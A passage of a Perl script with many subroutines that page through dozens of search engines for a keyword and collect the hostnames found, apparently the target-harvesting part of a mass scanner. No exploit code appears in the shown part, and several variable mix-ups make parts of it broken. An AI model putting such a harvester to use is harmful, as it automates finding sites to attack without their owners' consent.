  2524.                         my $link = $1; if ($link!~ /msn|live|google|yahoo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2525.                 }
  2526.         }
  2527. return @list;
  2528. }
  2529. #### -
  2530. sub uol() {
  2531.     my @list;
  2532.     my $key = $_[0];
  2533.     for (my $i=1; $i<=1000; $i+=100) {
  2534.         my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);
  2535.         my $res = &search_engine_query($search);
  2536.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2537.             my $link = $1; if ($link!~ /uol/) { $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2538.         }
  2539.     }
  2540. return @list;
  2541. }
  2542. ############### GOED
  2543. sub bing() {
  2544.     my @list;
  2545.     my $key = $_[0];
  2546.     for (my $i=1; $i<=1000; $i+=100) {
  2547.         my $search = ("http://www.bing.com/search?q=".&key($key)."&first=".$i."&FORM=PERE");
  2548.         my $res = &search_engine_query($search);
  2549.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2550.             my $link = $1; if ($link!~ /bingj|bing\.com/) { $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2551.         }
  2552.     }
  2553. return @list;
  2554. }
  2555. ############### GOED
  2556. sub altavista() {
  2557.     my @list;
  2558.     my $key = $_[0];
  2559.     for (my $i=1; $i<=1000; $i+=100){
  2560.         my $search = ("http://search.yahoo.com/search?n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=".$i."&vf=all&vm=p&fl=0&fr=altavista&p=".&key($key)."&vs=");
  2561.         my $res = &search_engine_query($search);
  2562.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2563.             my $link = $1; if ($link!~ /yahoo\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2564.         }
  2565.     }
  2566. return @list;
  2567. }
  2568. ############### GOED
  2569. sub ask() {
  2570.     my @list;
  2571.     my $key = $_[0];
  2572.     for (my $i=1; $i<=1000; $i+=100) {
  2573.         my $search = ("http://uk.ask.com/web?q=".&key($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  2574.         my $res = &search_engine_query($search);
  2575.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2576.             my $link = $1; if ($link!~ /ask\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2577.         }
  2578.     }
  2579. return @list;
  2580. }
  2581. ############### GOED
  2582. sub yahoo(){
  2583.     my @list;
  2584.         my $key = $_[0];
  2585.         for ($b=1; $b<=1000; $b+=100) {
  2586.         my $search = ("http://search.yahoo.com/search?n=100&p=".&key($key)."&b=".$b);
  2587.         my $res = &search_engine_query($search);
  2588.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2589.             my $link = $1; if ($link!~ /yahoo\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2590.         }
  2591.     }
  2592. return @list;
  2593. }
  2594. ############### GOED
  2595. sub yahoo2() {
  2596.   my @list;
  2597.   my $key = $_[0];
  2598.   my @doms = ("at","au","br","ca","de","es","fr","it","uk");
  2599.   my $dom = $doms[rand(scalar(@doms))];
  2600.     for (my $i=1; $i<=1000; $i+=100) {
  2601.         my $search = ("http://".$domain.".search.yahoo.com/search?n=100&p=".&key($key)."&b=".$i);
  2602.         my $res = &search_engine_query($search);
  2603.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2604.             my $link = $1; if ($link!~ /yahoo\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2605.         }
  2606.     }
  2607. return @list;
  2608. }
  2609. ############### GOED
  2610. sub clusty() {
  2611.     my @list;
  2612.         my $key = $_[0];
  2613.         for ($b=10; $b<=1000; $b+=100) {
  2614.         my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
  2615.         my $res = &search_engine_query($search);
  2616.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2617.             my $link = $1; if ($link!~ /yippy\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2618.         }
  2619.     }
  2620. return @list;
  2621. }
  2622. #### +
  2623. sub gutser() {
  2624.     my @list;
  2625.     my $key = $_[0];
  2626.     for ($b=1; $b<=1000; $b+=100) {
  2627.         my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0");
  2628.         my $res = &search_engine_query($search);
  2629.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2630.             my $link = $1; if ($link!~ /goodsearch|good\.is|w3\.org|quantserve/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2631.         }
  2632.     }
  2633. return @list;
  2634. }
  2635. #### -
  2636. sub exalead() {
  2637.   my @list;
  2638.   my $key = $_[0];
  2639.     for ($b=0; $b<=1000; $b+=100) {
  2640.         my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);
  2641.         my $res = &search_engine_query($search);
  2642.         while ($res =~ m/http\/\/(.+?)\//g) {
  2643.             my $link = $1; if ($link!~ /exalead/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2644.             }
  2645.         }
  2646. return @list;  
  2647. }      
  2648. ############### GOED
  2649. sub lycos() {
  2650.   my @list;
  2651.   my $key = $_[0];
  2652.     for ($b=0; $b<=1000; $b+=100) {
  2653.         my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
  2654.         my $res = &search_engine_query($search);
  2655.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2656.             my $link = $1; if ($link!~ /lycos\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2657.         }
  2658.     }
  2659. return @list;  
  2660. }      
  2661. ############### GOED
  2662. sub virgilio() {
  2663.   my @list;
  2664.   my $key = $_[0];
  2665.     for ($b=10; $b<=1000; $b+=100) {
  2666.         my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=100&offset=".$b);
  2667.         my $res = &search_engine_query($search);
  2668.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2669.             my $link = $1; if ($link!~ /\.virgilio\.it/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2670.         }
  2671.     }
  2672. return @list;  
  2673. }      
  2674. #### +
  2675. sub webde() {
  2676.   my @list;
  2677.   my $key = $_[0];
  2678.     for ($b=1; $b<=1000; $b+=100) {
  2679.         my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&key($key)."&search=Suche");
  2680.         my $res = &search_engine_query($search);
  2681.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2682.             my $link = $1; if ($link!~ /suche|web/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2683.         }
  2684.     }
  2685. return @list;  
  2686. }
  2687. #### -
  2688. sub hotbot() {
  2689.   my @list;
  2690.   my $key = $_[0];
  2691.     for ($b=0; $b<=1000; $b+=100) {
  2692.         my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
  2693.         my $res = &search_engine_query($search);
  2694.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2695.             my $link = $1; if ($link!~ /hotbot/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2696.         }
  2697.     }
  2698. return @list;  
  2699. }
  2700. #### + 
  2701. sub aol() {
  2702.   my @list;
  2703.   my $key = $_[0];
  2704.     for ($b=2; $b<=1000; $b+=100) {
  2705.         my $search = ("http://aim.search.aol.com/aol/search?q=".&key($key)."&page=".$b);
  2706.         my $res = &search_engine_query($search);
  2707.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2708.             my $link = $1; if ($link!~ /aol/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2709.         }
  2710.     }
  2711. return @list;  
  2712. }
  2713. #### +
  2714. sub sapo(){
  2715.     my @list;
  2716.         my $key = $_[0];
  2717.         for ($b=1; $b<=1000; $b+=100) {
  2718.         my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=100&location=pt&page=".$b."&q=".&key($key)."&st=local");
  2719.         my $res = &search_engine_query($search);
  2720.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2721.             my $link = $1; if ($link!~ /sapo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2722.         }
  2723.     }
  2724. return @list;
  2725. }
  2726. ############### GOED
  2727. sub duck() {
  2728.         my @list;
  2729.         my $key = $_[0];
  2730.         for ($b=1; $b<=1000; $b+=100) {
  2731.         my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&l=us-en&p=".$b."&s=100&o=json&dc=54&api=d.js");
  2732.         my $res = &search_engine_query($search);
  2733.         while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\//g) {
  2734.             my $link = $1; if ($link!~ /duckduckgo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2735.         }
  2736.     }
  2737. return @list;
  2738. }
  2739. #### -
  2740. sub yause() {
  2741.         my @list;
  2742.         my $key = $_[0];
  2743.         for ($b=1; $b<=1000; $b+=100) {
  2744.         my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
  2745.         my $res = &search_engine_query($search);
  2746.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2747.             my $link = $1; if ($link!~ /yauba\.com/){$link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2748.         }
  2749.     }
  2750. return @list;
  2751. }
  2752. ############### GOED
  2753. sub baidu() {
  2754.         my @list;
  2755.         my $key = $_[0];
  2756.         for ($b=0; $b<=1000; $b+=100) {
  2757.         my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
  2758.         my $res = &search_engine_query($search);
  2759.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2760.             my $link = $1; if ($link!~ /baidu\.com/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2761.         }
  2762.     }
  2763. return @list;
  2764. }
  2765. ############### GOED
  2766. sub black() {
  2767.         my @list;
  2768.         my $key = $_[0];
  2769.         for ($b=0; $b<=1000; $b+=100) {
  2770.         my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
  2771.         my $res = &search_engine_query($search);
  2772.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2773.             my $link = $1; if ($link!~ /blekko/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2774.         }
  2775.     }
  2776. return @list;
  2777. }
  2778. ############### GOED
  2779. sub onet() {
  2780.         my @list;
  2781.         my $key = $_[0];
  2782.         for ($b=1; $b<=1000; $b+=100) {
  2783.         my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
  2784.         my $res = &search_engine_query($search);
  2785.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2786.             my $link = $1; if ($link!~ /onet|webcache|query/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2787.         }
  2788.     }
  2789. return @list;
  2790. }
  2791. ############### GOED
  2792. sub sizuka() {
  2793.         my @list;
  2794.         my $key = $_[0];
  2795.         for ($b=10; $b<=1000; $b+=100) {
  2796.         my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
  2797.         my $res = &search_engine_query($search);
  2798.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2799.             my $link = $1; if ($link!~ /szukacz/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2800.         }
  2801.     }
  2802. return @list;
  2803. }
  2804. #### -
  2805. sub walla() {
  2806.         my @list;
  2807.         my $key = $_[0];
  2808.         for ($b=0; $b<=1000; $b+=100) {
  2809.         my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);
  2810.         my $res = &search_engine_query($search);
  2811.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2812.             my $link = $1; if ($link!~ /walla\.co\.il/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2813.         }
  2814.     }
  2815. return @list;
  2816. }
  2817. #### -
  2818. sub demos() {
  2819.         my @list;
  2820.         my $key = $_[0];
  2821.         for ($b=0; $b<=1000; $b+=100) {
  2822.         my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
  2823.         my $res = &search_engine_query($search);
  2824.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2825.             my $link = $1; if ($link!~ /search|dmoz/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2826.         }
  2827.     }
  2828. return @list;
  2829. }
  2830. #### -
  2831. sub rose() {
  2832.   my @list;
  2833.   my $key = $_[0];
  2834.   my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
  2835.         my $lang = $langs[rand(scalar(@langs))];
  2836.     for ($b=0; $b<=1000; $b+=100) {
  2837.         my $search = ("http://euroseek.com/system/search.cgi?language=".$language."&mode=internet&start=".$b."&string=".&key($key));
  2838.         my $res = &search_engine_query($search);
  2839.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2840.             my $link = $1; if ($link!~ /euroseek/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2841.         }
  2842.     }
  2843. return @list;
  2844. }
  2845. ############### GOED
  2846. sub seznam() {
  2847.         my @list;
  2848.         my $key = $_[0];
  2849.         for ($b=1; $b<=1000; $b+=100) {
  2850.         my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=100&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
  2851.         my $res = &search_engine_query($search);
  2852.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2853.             my $link = $1; if ($link!~ /seznam/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2854.         }
  2855.     }
  2856. return @list;
  2857. }
  2858. #### -
  2859. sub tiscali() {
  2860.         my @list;
  2861.         my $key = $_[0];
  2862.         for ($b=0; $b<=1000; $b+=100) {
  2863.         my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
  2864.         my $res = &search_engine_query($search);
  2865.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2866.             my $link = $1; if ($link!~ /tiscali/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2867.         }
  2868.     }
  2869. return @list;
  2870. }
  2871. #### +
  2872. sub naver() {
  2873.         my @list;
  2874.         my $key = $_[0];
  2875.         for ($b=1; $b<=1000; $b+=100) {
  2876.         my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0&lang=all&f=&srcharea=all&st=s&fd=2&start=".$b."&display=100");
  2877.         my $res = &search_engine_query($search);
  2878.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2879.             my $link = $1; if ($link!~ /naver/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2880.         }
  2881.     }
  2882. return @list;
  2883. }
  2884. #### +
  2885. sub amidalla(){
  2886.     my @list;
  2887.     my $key = $_[0];
  2888.     for ($i=0; $i<=1000; $i+=100){
  2889.         my $web=("http://www.amidalla.de/cgi-bin/amisearch.cgi?search=".&key($key)."&page=".$i."&break=100&af=2&tld=com&et=2");        
  2890.         my $Res=&search_engine_query($web);
  2891.         while ($Res =~ m/http:\/\/(.+?)\//g){
  2892.             my $link = $1; if ($link!~ /amidalla/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2893.         }
  2894.     }
  2895. return @list;
  2896. }
  2897. #### +
  2898. sub buscar() {
  2899.     my @list;
  2900.     my $key = $_[0];
  2901.     for (my $i=1; $i<=1000; $i+=100){
  2902.         my $search = ("http://buscar.ozu.es/index.php?etq=web&q=".&key($key)."&pag=".$i);
  2903.         my $res = &search_engine_query($search);
  2904.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2905.             my $link = $1; if ($link!~ /buscar/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2906.         }
  2907.     }
  2908. return @list;
  2909. }
  2910. ############### GOED
  2911. sub kvasir() {
  2912.     my @list;
  2913.     my $key = $_[0];
  2914.     for (my $i=10; $i<=1000; $i+=100){
  2915.         my $search = ("http://www.kvasir.no/nettsok?offset=".$i."&pageSize=100&q=".&key($key)."");
  2916.         my $res = &search_engine_query($search);
  2917.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2918.             my $link = $1; if ($link!~ /kvasir/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2919.         }
  2920.     }
  2921. return @list;
  2922. }
  2923. #### -
  2924. sub excite(){
  2925.     my @list;
  2926.     my $key = $_[0];
  2927.     for ($i=0; $i<=1000; $i+=100){
  2928.         my $web=("http://msxml.excite.com/excite/ws/results/Web/".&key($key)."/".$i."/0/0/Relevance/zoom=off/qi=31/qk=10/bepersistence=true/_iceUrlFlag=7?_IceUrl=true");
  2929.         my $Res= &search_engine_query($web);
  2930.         while ($Res =~ m/http:\/\/(.+?)\//g){
  2931.             my $link = $1; if ($link!~ /excite/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2932.         }
  2933.     }
  2934. return @list;
  2935. }
  2936. ############### GOED
  2937. sub interia() {
  2938.     my @list;
  2939.     my $key = $_[0];
  2940.     for ($i = 0;$i<= 1000; $i+= 100) {
  2941.         my $search = ( "http://www.google.interia.pl/szukaj?q=".&key($key)."&s=szukaj&w=sw&szukaj=&p=".$i);
  2942.         my $res = &search_engine_query($search);
  2943.         while ($res =~ m/http:\/\/(.+?)\/(.*)<\/a>/g) {
  2944.             my $link = $1; if ($link!~ /google|interia/ ) { $link =~ s/<//g; $link =~ s/ //g; my @grepb = &links($link); push(@list,@grep); }
  2945.        }
  2946.    }
  2947. return @list;
  2948. }
  2949. #### +
  2950. sub snz() {
  2951.     my @list;
  2952.     my $key = $_[0];
  2953.     for (my $i=1; $i<=1000; $i+=100) {
  2954.         my $search = ("http://searchnz.co.nz/search.aspx?q=".&key($key)."&np=".$i);
  2955.         my $res = &search_engine_query($search);
  2956.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2957.             my $link = $1; if ($link!~ /searchnz/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2958.         }
  2959.     }
  2960. return @list;
  2961. }
  2962. ############### GOED
  2963. sub rambler(){
  2964.     my @list;
  2965.     my $key = $_[0];
  2966.     for ($b=1; $b<=1000; $b++){
  2967.         my $search=("http://nova.rambler.ru/srch?btnG=DtD%B0DaN?D%B8!&query=".&key($key)."&page=".$b);
  2968.         my $res= &search_engine_query($search);
  2969.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2970.             my $link = $1; if ($link!~ /rambler|nova|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2971.         }
  2972.     }
  2973. return @list;
  2974. }
  2975. #### +
  2976. sub yandex(){
  2977.     my @list;
  2978.     my $key = $_[0];
  2979.     for ($b=0; $b<=1000; $b+=100){
  2980.         my $search=("http://yandex.ru/yandsearch?p=".$b."&text=".&key($key)."&lr=118");
  2981.         my $res= &search_engine_query($search);
  2982.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2983.             my $link = $1; if ($link!~ /yandex/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2984.         }
  2985.     }
  2986. return @list;
  2987. }
  2988. ###
  2989. sub doogate(){
  2990.     my @list;
  2991.     my $key = $_[0];
  2992.     for ($i=0; $i<=1000; $i+=100){
  2993.         my $web=("http://www.doogate.com/search?q=".key($key)."&start=".$i);
  2994.         my $Res= search_engine_query($web);
  2995.         while ($Res =~ m/<a href=\"http:\/\/(.+?)\//g){
  2996.                         my $link = $1; if ($link!~ /doogate/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  2997.         }
  2998.     }
  2999. return @list;
  3000. }
  3001. ###
  3002. sub sogou() {
  3003.     my @list;
  3004.     my $key = $_[0];
  3005.     for (my $b=1; $b<=50; $b+=1){
  3006.         my $search = ("http://www.sogou.com/web?query=".&key($key)."&page=".$b);
  3007.         my $res = search_engine_query($search);
  3008.         while ($res =~ m/<a name="dttl" target="_blank" href="http:\/\/(.*?)\"/g) {
  3009.             my $link = $1; if ($link!~ /sogou/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3010.         }
  3011.     }
  3012. return @list;
  3013. }
  3014. ###
  3015. sub joeant(){
  3016.     my @list;
  3017.     my $key = $_[0];
  3018.     for ($b=0; $b<=50; $b+=10){
  3019.         my $search=("http://www.joeant.com/DIR/search.php?keywords=".&key($key)."&page=".$b."&limit=10");
  3020.         my $res= search_engine_query($search);
  3021.         while ($res =~ m/<a href=\http:\/\/(.*?)\//g) {
  3022.             my $link = $1; if ($link!~ /joeant/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3023.         }
  3024.     }
  3025. return @list;
  3026. }
  3027. ###
  3028. sub terra(){
  3029.     my @list;
  3030.     my $key = $_[0];
  3031.     for ($b=0; $b<=50; $b+=10){
  3032.         my $search=("http://buscador.terra.com/Results.aspx?ca=a&source=Search&query=".$key);
  3033.         my $res= search_engine_query($search);
  3034.         while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  3035.             my $link = $1; if ($link!~ /terra/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3036.         }
  3037.     }
  3038. return @list;
  3039. }
  3040. ###
  3041. sub youdao() {
  3042.         my @list;
  3043.         my $key = $_[0]; {
  3044.         my $search = ("http://www.youdao.com/search?q=".&key($key)."&start=10&ue=utf8&keyfrom=".$b."&lq=".&key($key)."&timesort=0");
  3045.         my $res = search_engine_query($search);
  3046.         while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  3047.             my $link = $1; if ($link!~ /youdao/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3048.         }
  3049.     }
  3050. return @list;
  3051. }
  3052. ###
  3053. sub amfibi() {
  3054.         my @list;
  3055.         my $key = $_[0]; {
  3056.         my $search = ("http://www.amfibi.com/search?query=".&key($key)."&start=".$b);
  3057.         my $res = search_engine_query($search);
  3058.         while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  3059.             my $link = $1; if ($link!~ /amfibi|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3060.         }
  3061.     }
  3062. return @list;
  3063. }
  3064. ###
  3065. sub bigclique() {
  3066.         my @list;
  3067.         my $key = $_[0];
  3068.         for ($b=1; $b<=200; $b+=10) {
  3069.             $num += $num;
  3070.         my $search = ("http://www.bigclique.com/search.jsp?query=".&key($key)."&hitsPerPage=10&start=".$num."&hitsPerSite=".$b);
  3071.         my $res = search_engine_query($search);
  3072.         while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
  3073.             my $link = $1; if ($link!~ /bigclique|cached/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3074.         }
  3075.     }
  3076. return @list;
  3077. }
  3078. ###
  3079. sub dancefloor() {
  3080.         my @list;
  3081.         my $key = $_[0];
  3082.         for ($b=1; $b<=200; $b+=10) {
  3083.             $num += $num;
  3084.         my $search = ("http://www.dancefloorhireuk.co.uk/events/search.php?query=".&key($key)."&start=".$b."&search=1&results=10&type=and&domain=");
  3085.         my $res = search_engine_query($search);
  3086.         while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
  3087.             my $link = $1; if ($link!~ /dancefloor|query/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3088.         }
  3089.     }
  3090. return @list;
  3091. }
  3092. ###
  3093. sub rakuten() {
  3094.         my @list;
  3095.         my $key = $_[0];
  3096.         for ($b=1; $b<=200; $b+=10) {
  3097.         my $search = ("http://websearch.rakuten.co.jp/Web?qt=".&key($key)."&col=OW&lg=all&st=".$b."&svx=101722");
  3098.         my $res = search_engine_query($search);
  3099.         while ($res =~ m/<a class="sc_result result" href=\"http:\/\/(.+?)\"/g) {
  3100.             my $link = $1; if ($link!~ /rakuten/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3101.         }
  3102.     }
  3103. return @list;
  3104. }
  3105. ###
  3106. sub nova() {
  3107.         my @list;
  3108.         my $key = $_[0];
  3109.         for ($b=1; $b<=200; $b+=10) {
  3110.             $num += $num;
  3111.         my $search = ("http://nova.rambler.ru/srch?query=".&key($key)."&page=".$b."&start=".$num);
  3112.         my $res = search_engine_query($search);
  3113.         while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
  3114.             my $link = $1; if ($link!~ /rambler|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3115.         }
  3116.     }
  3117. return @list;
  3118. }
  3119. ###
  3120. sub najdi() {
  3121.         my @list;
  3122.         my $key = $_[0];
  3123.         for ($b=1; $b<=200; $b+=10) {
  3124.             $num += $num;
  3125.         my $search = ("http://www.najdi.si/search.jsp?q=".&key($key)."&o=".$b."&maxHitsPerGroup=".$num);
  3126.         my $res = search_engine_query($search);
  3127.         while ($res =~ m/<a href=\"http:\/\/(.+?)\" onmousedown/g) {
  3128.             my $link = $1; if ($link!~ /najdi|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3129.         }
  3130.     }
  3131. return @list;
  3132. }
  3133. ###
  3134. sub goo() {
  3135.         my @list;
  3136.         my $key = $_[0];
  3137.         for ($b=1; $b<=200; $b+=10) {
  3138.         my $search = ("http://search.goo.ne.jp/web.jsp?STYPE=web&OE=UTF-8&MT=".&key($key)."&IE=UTF-8&FR=".$b."&from=pager");
  3139.         my $res = search_engine_query($search);
  3140.         while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {
  3141.             my $link = $1; if ($link!~ /goo/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3142.         }
  3143.     }
  3144. return @list;
  3145. }
  3146. ###
  3147. sub uksubmit() {
  3148.         my @list;
  3149.         my $key = $_[0];
  3150.         for ($b=1; $b<=200; $b+=10) {
  3151.         my $search = ("http://www.uksubmit.co.uk/index.php?query=".&key($key)."&searchType=Web&page=".$b);
  3152.         my $res = search_engine_query($search);
  3153.         while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
  3154.             my $link = $1; if ($link!~ /uksubmit/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3155.         }
  3156.     }
  3157. return @list;
  3158. }
  3159. ############### NIEUWE ###############
  3160. sub netsprint(){
  3161.         my @list;
  3162.         my $key = $_[0];
  3163.         for($b=1;$b<=1000;$b+=100){
  3164.                 my $Th=("http://www.netsprint.pl/serwis/search?q=".key($key)."&rpp=10&pg=".$b."&ff=0&z=1&format=-1");
  3165.                 my $Res=&search_engine_query($Th);
  3166.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3167.                         my $link = $1; if ($link!~ /netsprint/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3168.                         }
  3169.                 }
  3170. return @list;
  3171. }
  3172. sub saol(){
  3173.         my @list;
  3174.         my $key = $_[0];
  3175.         for($b=1;$b<=1000;$b+=100){
  3176.                 my $Th=("http://search.aol.com/aol/search?enabled_terms=&q=".key($key)."&s_it=comsearch50&page=".$b."&oreq=810a106cf821477ab0349f9caa875f82&v_t=comsearch50");
  3177.                 my $Res=&search_engine_query($Th);
  3178.                 while($Res =~ m/<span property=\"f:durl\">(.+?)<\/span>/g){
  3179.                         my $link = $1; if ($link!~ /aol/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3180.                 }
  3181.         }
  3182. return @list;
  3183. }
  3184. sub lookle(){
  3185.         my @list;
  3186.         my $key = $_[0];
  3187.         for($b=1;$b<=1000;$b+=100){
  3188.                 my $Th=("http://www.lookle.com/search/index.php?page=search/web&search=".key($key)."&type=web&startpage=".$b);
  3189.                 my $Res=&search_engine_query($Th);
  3190.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3191.                         my $link=$1; if ($link!~ /lookle/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3192.                         }
  3193.                 }
